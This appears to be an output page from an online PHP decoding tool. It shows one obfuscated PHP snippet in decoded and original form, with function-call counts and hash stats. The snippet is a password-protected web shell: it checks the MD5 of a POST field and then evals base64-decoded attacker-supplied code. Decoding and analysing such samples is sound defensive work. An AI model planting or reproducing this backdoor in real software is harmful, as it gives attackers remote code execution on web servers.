Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
..
Decoded Output download
<?php $b = "b"."a"."se6"."4_"."d"."ec"."od"."e"; $m = "md5";$d="d"."d";$e=$m("343");$f=$b("ZmQ"."0"."NWR"."jZ"."GI0NGF"."iODVi"."Yj"."M2N"."WVmY"."TE4Zj"."Q4MTM3OGQ="); if($m($_POST[$d])==$f){ eval($b($_POST[$d.'1'])); } else {echo $e;die();} ?>
Did this file decode correctly?
Original Code
<?php $b = "b"."a"."se6"."4_"."d"."ec"."od"."e"; $m = "md5";$d="d"."d";$e=$m("343");$f=$b("ZmQ"."0"."NWR"."jZ"."GI0NGF"."iODVi"."Yj"."M2N"."WVmY"."TE4Zj"."Q4MTM3OGQ="); if($m($_POST[$d])==$f){ eval($b($_POST[$d.'1'])); } else {echo $e;die();}
Function Calls
| md5 | 2 |
| base64_decode | 2 |
Stats
| MD5 | 24b6efbb1faeb92e86e8e824352a2a3a |
| Eval Count | 0 |
| Decode Time | 320 ms |